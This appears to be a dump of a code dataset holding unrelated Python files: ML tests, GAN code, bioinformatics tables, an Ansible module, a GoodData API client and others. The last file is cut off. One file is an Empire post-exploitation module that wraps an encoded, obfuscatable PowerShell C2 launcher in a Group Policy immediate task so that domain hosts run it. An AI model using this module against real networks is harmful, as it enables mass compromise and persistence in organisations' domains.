text
stringlengths 2
999k
|
|---|
# Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
def forward(self, x, y, z, w):
x = F.relu(x)
y = F.relu(y)
z = F.relu(z)
w = F.relu(w)
return x, y, z, w
def test():
net = Model()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 16)
y = torch.rand(12, 2, 16)
z = torch.rand(1, 3, 12, 16)
w = torch.rand(1, 5, 7, 9, 11)
a0, a1, a2, a3 = net(x, y, z, w)
# export torchscript
mod = torch.jit.trace(net, (x, y, z, w))
mod.save("test_F_relu.pt")
# torchscript to pnnx
import os
os.system("../src/pnnx test_F_relu.pt inputshape=[1,16],[12,2,16],[1,3,12,16],[1,5,7,9,11]")
# pnnx inference
import test_F_relu_pnnx
b0, b1, b2, b3 = test_F_relu_pnnx.test_inference()
return torch.equal(a0, b0) and torch.equal(a1, b1) and torch.equal(a2, b2) and torch.equal(a3, b3)
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
|
# AUTOGENERATED! DO NOT EDIT! File to edit: Discrminators.ipynb (unless otherwise specified).
__all__ = ['ProjectionDiscriminator', 'UnconditionalDiscriminator']
# Cell
#hide
from fastai import *
from fastai.vision import *
from fastai.callbacks import *
from fastai.utils.mem import *
from fastai.vision.gan import *
from PIL import Image
import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
from torch.nn import utils
from torch.nn import init
from torch.utils.data import DataLoader
from torch.utils.data.dataset import TensorDataset
import pdb
from .building_blocks import *
# Cell
class ProjectionDiscriminator(nn.Module):
"Projection based discrminator, adapted from: https://github.com/XHChen0528/SNGAN_Projection_Pytorch"
def __init__(self, num_feat=64, num_classes=0, activation=nn.ReLU()):
super().__init__()
self.num_feat = num_feat
self.num_classes = num_classes
self.activation = activation
self.blocks = [OptimizedBlock(3, num_feat)]
self.blocks.extend([
DisResBlock(num_feat*(2**i), num_feat*(2**(i+1)), downsample=True) for i in range(4)
])
self.l6 = torch.nn.utils.spectral_norm(nn.Linear(num_feat * 16, 1))
self.style = torch.nn.utils.spectral_norm(
nn.Linear(3, num_feat * 16))
self._initialize()
def _initialize(self):
init.xavier_uniform_(self.l6.weight.data)
optional_l_y = getattr(self, 'l_y', None)
if optional_l_y is not None:
init.xavier_uniform_(optional_l_y.weight.data)
def forward(self, x, y=None):
for block in self.blocks:
x = block(x)
h = self.activation(x)
h = torch.sum(h, dim=(2, 3))
output = self.l6(h)
if y is not None:
output += torch.sum(self.style(y) * h, dim=1, keepdim=True)
return output
# Cell
class UnconditionalDiscriminator(nn.Module):
def __init__(self):
super().__init__()
self.model = nn.Sequential(
nn.Conv2d(3, 64, 3, 2, 1),
conv_and_res(64, 128),
conv_and_res(128, 256),
conv_and_res(256, 512),
nn.Conv2d(512, 1, 3, stride=1),
Flatten(),
nn.Linear(144, 1)
)
def forward(self, xb):
return self.model(xb)
|
from typing import Optional
from pyexlatex.models.item import (
StringAdditionMixin,
IsSpecificClassMixin,
IsLatexItemMixin,
_basic_item_str,
_multi_option_item_str,
ItemBase
)
class LineSpacing(ItemBase):
def __init__(self, line_spacing: float):
self.logical_line_spacing = line_spacing
self.latex_line_spacing = latex_line_spacing_from_logical_line_spacing(line_spacing)
super().__init__()
@property
def name(self):
if self.logical_line_spacing == 2:
return 'doublespacing'
if self.logical_line_spacing == 1.5:
return 'onehalfspacing'
if self.logical_line_spacing == 1:
return 'singlespacing'
else:
return 'setstretch'
@property
def _options_str(self) -> str:
if self.logical_line_spacing in (1, 1.5, 2):
return ''
return f'{self.latex_line_spacing}'
def __str__(self):
options = self._options_str
if options:
return _basic_item_str(self.name, options)
return _multi_option_item_str(self.name)
def latex_line_spacing_from_logical_line_spacing(line_spacing: float) -> float:
"""
Latex for some reason has 1.65 as double line spacing, 1.325 as one and a half
line spacing, and 1 as single spacing. Take an input on a normal scale (2 is
double spaced, 1 is single space, 1.5 is one and a half spacing, and so on), and
convert to the latex scale.
Args:
line_spacing:
Returns:
"""
return round((line_spacing - 1) * (0.65/1) + 1, 2)
|
#!/usr/bin/env python
"""
Tool to pre-process documents contained one or more directories, and export a document-term matrix for each directory.
"""
import os, os.path, sys, codecs
import logging as log
from optparse import OptionParser
import text.util
# --------------------------------------------------------------
def main():
parser = OptionParser(usage="usage: %prog [options] directory1 directory2 ...")
parser.add_option("--df", action="store", type="int", dest="min_df", help="minimum number of documents for a term to appear", default=10)
parser.add_option("--tfidf", action="store_true", dest="apply_tfidf", help="apply TF-IDF term weight to the document-term matrix")
parser.add_option("--norm", action="store_true", dest="apply_norm", help="apply unit length normalization to the document-term matrix")
parser.add_option("--minlen", action="store", type="int", dest="min_doc_length", help="minimum document length (in characters)", default=10)
parser.add_option("-s", action="store", type="string", dest="stoplist_file", help="custom stopword file path", default=None)
parser.add_option("-o","--outdir", action="store", type="string", dest="dir_out", help="output directory (default is current directory)", default=None)
parser.add_option("--ngram", action="store", type="int", dest="max_ngram", help="maximum ngram range (default is 1, i.e. unigrams only)", default=1)
# Parse command line arguments
(options, args) = parser.parse_args()
if( len(args) < 1 ):
parser.error( "Must specify at least one directory" )
log.basicConfig(level=20, format='%(message)s')
if options.dir_out is None:
dir_out = os.getcwd()
else:
dir_out = options.dir_out
# Load required stopwords
if options.stoplist_file is None:
stopwords = text.util.load_stopwords()
else:
log.info( "Using custom stopwords from %s" % options.stoplist_file )
stopwords = text.util.load_stopwords( options.stoplist_file )
# Process each directory
for in_path in args:
dir_name = os.path.basename( in_path )
# Read content of all documents in the directory
docgen = text.util.DocumentBodyGenerator( [in_path], options.min_doc_length )
docs = []
doc_ids = []
for doc_id, body in docgen:
docs.append(body)
doc_ids.append(doc_id)
log.info( "Found %d documents to parse" % len(docs) )
# Pre-process the documents
log.info( "Pre-processing documents (%d stopwords, tfidf=%s, normalize=%s, min_df=%d, max_ngram=%d) ..." % (len(stopwords), options.apply_tfidf, options.apply_norm, options.min_df, options.max_ngram ) )
(X,terms) = text.util.preprocess( docs, stopwords, min_df = options.min_df, apply_tfidf = options.apply_tfidf, apply_norm = options.apply_norm, ngram_range = (1,options.max_ngram) )
log.info( "Created %dx%d document-term matrix" % X.shape )
# Save the pre-processed documents
out_prefix = os.path.join( dir_out, dir_name )
text.util.save_corpus( out_prefix, X, terms, doc_ids )
# --------------------------------------------------------------
if __name__ == "__main__":
main()
|
from collections import OrderedDict
from app.dataformats import peptable as peptabledata
from app.actions.mergetable import (simple_val_fetch, fill_mergefeature,
get_isobaric_quant)
from app.actions.proteindata import create_featuredata_map
def build_peptidetable(pqdb, headerfields, isobaric=False,
precursor=False, fdr=False, pep=False,
genecentric=False):
"""Fetches peptides and quants from joined lookup table, loops through
them and when all of a peptides quants/data have been collected, yields
peptide quant information."""
peptidedatamap = create_featuredata_map(pqdb, genecentric=genecentric,
psm_fill_fun=add_psm_to_peptidedata, pgene_fill_fun=add_protgene_to_pepdata,
is_peptides=True)
count_psms(peptidedatamap)
empty_return = lambda x, y, z: {}
iso_fun = {True: get_isobaric_quant, False: empty_return}[isobaric]
ms1_fun = {True: get_precursor_quant, False: empty_return}[precursor]
fdr_fun = {True: get_pep_fdr,
False: empty_return}[fdr]
pep_fun = {True: get_peptide_pep,
False: empty_return}[pep]
pdata_fun = get_protein_data
peptide_sql, sqlfieldmap = pqdb.prepare_mergetable_sql(precursor, isobaric,
probability=False,
fdr=fdr, pep=pep)
peptides = pqdb.get_merged_features(peptide_sql)
peptide = next(peptides)
outpeptide = {peptabledata.HEADER_PEPTIDE: peptide[sqlfieldmap['p_acc']]}
check_pep = {k: v for k, v in outpeptide.items()}
fill_mergefeature(outpeptide, iso_fun, ms1_fun, empty_return, fdr_fun,
pep_fun, pdata_fun, peptide, sqlfieldmap,
headerfields, peptidedatamap)
for peptide in peptides:
p_seq = peptide[sqlfieldmap['p_acc']]
if p_seq != outpeptide[peptabledata.HEADER_PEPTIDE]:
if outpeptide != check_pep:
yield outpeptide
outpeptide = {peptabledata.HEADER_PEPTIDE: p_seq}
check_pep = {k: v for k, v in outpeptide.items()}
fill_mergefeature(outpeptide, iso_fun, ms1_fun, empty_return, fdr_fun,
pep_fun, pdata_fun, peptide, sqlfieldmap,
headerfields, peptidedatamap)
yield outpeptide
def get_precursor_quant(peptide, sqlmap, headerfields):
return simple_val_fetch(peptide, sqlmap,
headerfields['precursorquant'][
peptabledata.HEADER_AREA], 'preq_val')
def get_pep_fdr(peptide, sqlmap, headerfields):
return simple_val_fetch(peptide, sqlmap,
headerfields['peptidefdr'][
peptabledata.HEADER_QVAL], 'fdr_val')
def get_peptide_pep(peptide, sqlmap, headerfields):
return simple_val_fetch(peptide, sqlmap,
headerfields['peptidepep'][
peptabledata.HEADER_PEP], 'pep_val')
def get_no_psms(peptide, pdata, headerfields):
hfields = [peptabledata.HEADER_NO_PSM,
]
seq = peptide[peptabledata.HEADER_PEPTIDE]
outdict = {}
for pool, psms in pdata[seq]['psms'].items():
pool_values = [psms]
outdict.update({headerfields['nopsms'][hfield][pool]: val
for (hfield, val) in zip(hfields, pool_values)})
return outdict
def get_protein_data(peptide, pdata, headerfields, accfield):
"""These fields are currently not pool dependent so headerfields
is ignored"""
report = get_proteins(peptide, pdata, headerfields)
return get_cov_descriptions(peptide, pdata, report)
def get_proteins(peptide, pdata, headerfields):
seq = peptide[peptabledata.HEADER_PEPTIDE]
outdict = {}
try:
proteins = ';'.join([x[0] for x in pdata[seq]['proteins']])
except TypeError:
pass
else:
outdict = {peptabledata.HEADER_PROTEINS: proteins}
for pool, psms in pdata[seq]['psms'].items():
outdict.update(
{headerfields['proteindata'][peptabledata.HEADER_NO_PSM][pool]:
psms})
return outdict
def get_cov_descriptions(peptide, pdata, report):
def format_val(value, valtype):
formatter = {int: lambda x: str(x),
float: lambda x: str(float(x)),
str: lambda x: x,
}
return formatter[valtype](value)
seq = peptide[peptabledata.HEADER_PEPTIDE]
for idx, key, keytype in zip([1, 2, 3, 4, 5],
[peptabledata.HEADER_COVERAGES,
peptabledata.HEADER_DESCRIPTIONS,
peptabledata.HEADER_GENES,
peptabledata.HEADER_ASSOCIATED,
peptabledata.HEADER_NO_CONTENTPROTEINS],
[float, str, str, str, int]):
try:
replist = [format_val(x[idx], keytype)
for x in pdata[seq]['proteins']]
except (TypeError, IndexError):
# index too high, or None skip, item will be NA'ed downstream
continue
if key in [peptabledata.HEADER_GENES, peptabledata.HEADER_ASSOCIATED]:
replist = OrderedDict([(x, 1) for x in replist]).keys()
try:
report[key] = ';'.join(replist)
except TypeError:
# None in list, skip, NA will be output
continue
return report
def count_psms(pdata):
for seq in pdata:
for pool in pdata[seq]['psms']:
pdata[seq]['psms'][pool] = len(pdata[seq]['psms'][pool])
def add_protgene_to_pepdata(peptidedata, seq, p_acc, dbrec, genecentric, pgcontentmap=None):
if genecentric == 'plain':
gene, desc, assoc_id, cov, pgcontent = None, dbrec[2], None, None, None
protein = (p_acc, cov, desc, gene, assoc_id)
elif genecentric:
gene = p_acc
desc, assoc_id = dbrec[2], dbrec[3]
cov, pgcontent = None, None
protein = (None, cov, desc, gene, assoc_id)
else:
desc, cov = dbrec[2], dbrec[3]
gene, assoc_id = dbrec[4], dbrec[5]
pgcontent = pgcontentmap[p_acc]
protein = (p_acc, cov, desc, gene, assoc_id, len(pgcontent))
try:
peptidedata[seq]['proteins'].add(protein)
except KeyError:
peptidedata[seq] = {'proteins': set()}
peptidedata[seq]['proteins'].add(protein)
def add_psm_to_peptidedata(peptidedata, p_acc, pool, psmdata):
seq, psm_id = psmdata[2], psmdata[3]
try:
peptidedata[seq]['psms'][pool].add(psm_id)
except KeyError:
try:
peptidedata[seq]['psms'][pool] = set()
except KeyError:
peptidedata[seq].update({'psms': {pool: set()}})
peptidedata[seq]['psms'][pool].add(psm_id)
|
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
module_name = 'New-GPOImmediateTask'
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
ObfuscateCommand = params['ObfuscateCommand']
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=obfuscate, obfuscationCommand=ObfuscateCommand,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
command = "/c \"" + launcher + "\""
if command == "":
return handle_error_message("[!] Error processing command")
else:
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(module_code, module_name)
script = module_name + " -Command cmd -CommandArguments '" + command + "' -Force"
for option, values in params.items():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname",
"domain", "domaincontroller"]:
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " '" + str(values) + "'"
outputf = params.get("OutputFunction", "Out-String")
script += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
import math
import IMLearn.learners.regressors.linear_regression
from IMLearn.learners.regressors import PolynomialFitting
from IMLearn.utils import split_train_test
import numpy as np
import pandas as pd
import plotly.graph_objects as go
import plotly.express as px
import plotly.io as pio
pio.templates.default = "simple_white"
def load_data(filename: str) -> pd.DataFrame:
"""
Load city daily temperature dataset and preprocess data.
Parameters
----------
filename: str
Path to house prices dataset
Returns
-------
Design matrix and response vector (Temp)
"""
# read file into dataframe
data = pd.read_csv(filename, parse_dates=True)
# value validation
data = data[data["Temp"] > -30]
data = data[data["Temp"] < 60]
# new features
data['DayOfYear'] = pd.to_datetime(data['Date']).dt.dayofyear
return data
if __name__ == '__main__':
np.random.seed(0)
# Question 1 - Load and preprocessing of city temperature dataset
df = load_data("../datasets/City_Temperature.csv")
# Question 2 - Exploring data for specific country
# temperatures in Israel as a function of Day Of Year
israel_df = df[df['Country'] == 'Israel']
graphs = []
#
for year in israel_df['Year'].unique():
df_per_year = israel_df[israel_df['Year'] == year]
y_temp = df_per_year['Temp']
graphs.append(go.Scatter(x=list(range(1, 366)),
y=y_temp,
mode='markers', name=f'{year}'))
#
fig = go.Figure(data=graphs)
fig.update_layout(
title="temperatures in Israel as a function of Day Of Year",
xaxis_title="day of year",
yaxis_title="temperatures",
height=600, width=1200)
fig.write_image("../exercises/temp.per.day.png")
# temperatures std in Israel as a function of months
fig = go.Figure(data=[go.Bar(x=list(range(1, 13)),
y=israel_df.groupby(['Month']).std()["Temp"])])
#
fig.update_layout(
title="temperatures std in Israel as a function of months",
xaxis_title="month",
yaxis_title="temperatures std")
fig.write_image("../exercises/temp.std.per.month.png")
# Question 3 - Exploring differences between countries
temp_statistic_df = df.groupby(['Country', 'Month']).Temp.agg([np.mean, np.std])
month_indices = temp_statistic_df.index.get_level_values('Month')
country_indices = temp_statistic_df.index.get_level_values('Country')
fig = px.line(temp_statistic_df,
x=month_indices,
y=temp_statistic_df['mean'],
error_y=temp_statistic_df['std'],
color=country_indices)
fig.update_layout(
title="mean temp +- std of all countries as a func of month",
xaxis_title="month",
yaxis_title="mean temp +- std")
fig.write_image("../exercises/mean.temp.for.each.coumtry.png")
# Question 4 - Fitting model for different values of `k`
# Randomly split the dataset into a training set (75%) and test set (25%)
sample_matrix = israel_df.drop("Temp", axis=1, inplace=False)
response = israel_df.Temp
train_X, train_y, test_X, test_y = split_train_test(sample_matrix, response)
# For every value k ∈ [1,10], fit a polynomial model of degree k using the training set
loss_list = []
min_loss, min_k = math.inf, 0
for k in range(1, 11):
poly_model = PolynomialFitting(k)
poly_model.fit(train_X["DayOfYear"], train_y)
# Record the loss of the model over the test set, rounded to 2 decimal places
loss = round(poly_model._loss(test_X["DayOfYear"], test_y), 2)
loss_list.append(loss)
if loss < min_loss: min_loss, min_k = loss, k # ensure the simplest model (min k)
print(f"loss of {k}-polynomial model over the test set: {loss}")
print(f"the optimal degree is: {min_k}, resulting in a loss of {min_loss}")
#plot
fig = go.Figure(data=[go.Bar(x=list(range(1, 11)),
y=loss_list)])
fig.update_layout(
title="loss of polynomial model as a func of polynomial degree k",
xaxis_title="k",
yaxis_title="loss of polynomial model")
fig.write_image("../exercises/loss.over.polynomial.degree.png")
# Question 5 - Evaluating fitted model on different countries
train_X, train_y = israel_df.drop('Temp', axis=1), israel_df.Temp
poly_model = PolynomialFitting(min_k)
poly_model.fit(train_X["DayOfYear"], train_y)
loss_list = []
for country in df['Country'].unique():
if country != "Israel":
country_df = df[df['Country'] == country]
loss = poly_model._loss(country_df["DayOfYear"], country_df.Temp)
loss_list.append(loss)
fig = go.Figure(data=[go.Bar(x=df[df['Country'] != 'Israel']['Country'].unique(),
y=loss_list)])
fig.update_layout(
title=f"polynomial fitting errors of countries other than Israel"
f"with the optimal degree {min_k} chosen in Israel subset fitting",
xaxis_title="country",
yaxis_title="loss of Polynomial fitting of degree k in israel")
fig.write_image("../exercises/countries.loss.over.min_k.png")
|
#!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ce_snmp_location
version_added: "2.4"
short_description: Manages SNMP location configuration on HUAWEI CloudEngine switches.
description:
- Manages SNMP location configurations on HUAWEI CloudEngine switches.
author:
- wangdezhuang (@QijunPan)
options:
location:
description:
- Location information.
required: true
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: CloudEngine snmp location test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Config SNMP location"
ce_snmp_location:
state: present
location: nanjing China
provider: "{{ cli }}"
- name: "Remove SNMP location"
ce_snmp_location:
state: absent
location: nanjing China
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: bool
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"location": "nanjing China",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"location": "nanjing China"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent sys-info location nanjing China"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import get_config, load_config, ce_argument_spec
class SnmpLocation(object):
""" Manages SNMP location configuration """
def __init__(self, **kwargs):
""" Class init """
# module
argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
# config
self.cur_cfg = dict()
# module args
self.state = self.module.params['state']
self.location = self.module.params['location']
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def check_args(self):
""" Check invalid args """
if self.location:
if len(self.location) > 255 or len(self.location) < 1:
self.module.fail_json(
msg='Error: The len of location %s is out of [1 - 255].' % self.location)
else:
self.module.fail_json(
msg='Error: The len of location is 0.')
def get_proposed(self):
""" Get proposed state """
self.proposed["state"] = self.state
if self.location:
self.proposed["location"] = self.location
def get_existing(self):
""" Get existing state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.cur_cfg["location"] = temp_data[1]
self.existing["location"] = temp_data[1]
def get_end_state(self):
""" Get end state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.end_state["location"] = temp_data[1]
def cli_load_config(self, commands):
""" Load config by cli """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_config(self):
""" Get config by cli """
regular = "| include snmp | include location"
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
return tmp_cfg
def set_config(self):
""" Set configure by cli """
cmd = "snmp-agent sys-info location %s" % self.location
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_config(self):
""" Undo configure by cli """
cmd = "undo snmp-agent sys-info location"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" Main work function """
self.check_args()
self.get_proposed()
self.get_existing()
if self.state == "present":
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
pass
else:
self.set_config()
else:
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
self.undo_config()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
location=dict(type='str', required=True)
)
argument_spec.update(ce_argument_spec)
module = SnmpLocation(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
|
from setuptools import setup
import versioneer
requirements = [
# package requirements go here
]
setup(
name='sqlerandxmler',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description="Execute queries and parse XMLs",
license="MIT",
author="Alex Nally",
author_email='alexjnally@gmail.com',
url='https://github.com/alexjnally/sqlerandxmler',
packages=['sqlerandxmler'],
entry_points={
'console_scripts': [
'sqlerandxmler=sqlerandxmler.cli:cli'
]
},
install_requires=requirements,
keywords='sqlerandxmler',
classifiers=[
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
)
|
import os
import json
import requests
import time
import logging
api_domain = os.getenv('GOODDATA_DOMAIN')
api_url = api_domain + "/gdc/projects/" + os.getenv('GOODDATA_PROJECT')
def auth_cookie():
sst = super_secured_token()
temp_token = temporary_token(sst)
return temp_token
def get_username():
if os.getenv('GOODDATA_USER') is None:
raise ValueError(
"Please set your env var GOODDATA_USER"
)
else:
return os.getenv('GOODDATA_USER')
def get_password():
if os.getenv('GOODDATA_PASSWORD') is None:
raise ValueError(
"Please set your env var GOODDATA_PASSWORD"
)
return os.getenv('GOODDATA_PASSWORD')
def get_useragent():
return "PyGyver-ETL/1.0"
def super_secured_token():
"""
Sends username and password to POST requests
verify_level - 0: HTTP Cookie, use GDCAuthSST in header
- 2: customHTTP header, use X-GDC-AuthSST in header (selected)
Returns
-------
sst (string) - SuperSecured Token
"""
url = os.getenv('GOODDATA_DOMAIN') + "/gdc/account/login/"
values = json.dumps({"postUserLogin": {"login": get_username(),
"password": get_password(),
"remember": 1,
"verify_level": 2
}
})
headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"User-Agent": get_useragent(),
}
response = requests.post(
url=url,
data=values,
headers=headers
)
# Check response's Status Code
if 200 <= response.status_code < 300:
content = json.loads(response.content)
sst_cookie = response.headers['X-GDC-AuthSST']
else:
raise ValueError(json.loads(response.content))
return sst_cookie
def temporary_token(sst):
"""
Include the returned TT (Temporary Token) when making API calls
to the GoodData Platform.
The TT is valud for a short period of time. If you receive status code
401 (Unauthorized) while calling any API resource, get a new TT -- the
SST must still be valid, which can be specified by the 'remember' option.
Parameters
----------
sst (string)
Returns
-------
"""
url = os.getenv('GOODDATA_DOMAIN') + "/gdc/account/token/"
headers = {
"Accept": "application/json",
"Content-Type": "application/json",
"User-Agent": get_useragent(),
"X-GDC-AuthSST": sst
}
response = requests.get(
url=url,
headers=headers
)
# Check response's Status Code
if 200 <= response.status_code < 300:
content = json.loads(response.content)
temp_token = content['userToken']['token']
else:
raise ValueError(response.content)
return temp_token
def get_header():
header = {
"Accept": "application/json",
"Content-Type": "application/json",
"User-Agent": get_useragent(),
"X-GDC-AuthTT": auth_cookie()
}
return header
def api_get_schedules():
uri = "/schedules?state=ENABLED&statuses=RUNNING"
response = requests.get(
url=api_url + uri,
headers=get_header()
)
return response
def api_post_execution(data, schedule_id):
uri = "/schedules/" + schedule_id + "/executions"
response = requests.post(
url=api_url + uri,
data=data,
headers=get_header()
)
return response
def api_get_status(uri):
response = requests.get(
url=api_domain + uri,
headers=get_header()
)
return response
def no_running_add_schedules(await_completion):
""" Checks for running GoodData ADD schedules.
Returns:
- True if there are no GoodData ADD schedules currently running
- False if there is currently a GoodData ADD schedule running
Usage:
- no_running_add_schedules()
"""
if await_completion:
response = api_get_schedules()
content = json.loads(response.content)
schedules = content['schedules']['items']
for schedule in schedules:
params = schedule['schedule']['params']
if 'GDC_DATALOAD_DATASETS' in params:
return False
return True
else:
return True
def execute_schedule(schedule_id, retry=False, await_completion=False, force_full_load=False):
""" Executes GoodData schedule.
Parameters:
- schedule_id (string): The ID of the GoodData schedule you want to execute.
- retry (boolean): If True, applies the reschedule property if the schedule has it set. When not set, defaults to False.
- await_completion (boolean): If True, waits for other add schedules to finish running.
- force_full_load (boolean): If True, forces load to be FULL no matter the original setting, ADD schedules only.
Required:
- GOODDATA_DOMAIN - Usually http://reports.made.com
- GOODDATA_PROJECT - The GoodData Project ID
- GOODDATA_USER - The login credentials for GoodData Report
- GOODDATA_PASSWORD - The login credentials for GoodData Report
Returns:
- URI link to schedule execution.
Usage:
- execute_schedule(a1bc3xyz, retry=True)
"""
if os.getenv('GOODDATA_DOMAIN') is None:
raise ValueError(
"Please set your env var GOODDATA_DOMAIN"
)
if os.getenv('GOODDATA_PROJECT') is None:
raise ValueError(
"Please set your env var GOODDATA_PROJECT"
)
params_dict={}
params_dict["retry"] = str(retry).lower()
if force_full_load:
params_dict["GDC_DATALOAD_SINGLE_RUN_LOAD_MODE"] = "FULL"
values = json.dumps({
"execution": {
"params": params_dict
}
})
while True:
if no_running_add_schedules(await_completion):
response = api_post_execution(
schedule_id=schedule_id,
data=values
)
if 200 <= response.status_code < 300:
content = json.loads(response.content)
uri = content['execution']['links']['self']
while True:
response = api_get_status(
uri=uri
)
content = json.loads(response.content)
status = content['execution']['status']
if status in ['RUNNING', 'SCHEDULED']:
logging.info("Graph has not completed, entering sleep for 15 seconds")
time.sleep(15)
elif status == 'OK':
logging.info('Graph completed with a OK status')
return status
else:
logging.info('Graph completed with a non OK status')
raise ValueError(status)
else:
raise ValueError(json.loads(response.content))
else:
logging.info('A schedule execution is already running. Sleeping for 60 seconds.')
time.sleep(60)
|
# Copyright 2016, 2017 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
State machine that performs the installation of Linux Distros.
"""
#
# IMPORTS
#
from socket import gethostbyname
from jsonschema import validate
from tessia.server.db.connection import MANAGER
from tessia.server.lib.post_install import PostInstallChecker
from tessia.server.state_machines.base import BaseMachine
from tessia.server.state_machines.autoinstall.dbcontroller import \
DbController
from tessia.server.state_machines.autoinstall.model import \
AutoinstallMachineModel
from tessia.server.state_machines.autoinstall.plat_lpar import PlatLpar
from tessia.server.state_machines.autoinstall.plat_kvm import PlatKvm
from tessia.server.state_machines.autoinstall.plat_zvm import PlatZvm
from tessia.server.state_machines.autoinstall.sm_anaconda import SmAnaconda
from tessia.server.state_machines.autoinstall.sm_autoyast import SmAutoyast
from tessia.server.state_machines.autoinstall.sm_debian import \
SmDebianInstaller
from tessia.server.state_machines.autoinstall.sm_subiquity import \
SmSubiquityInstaller
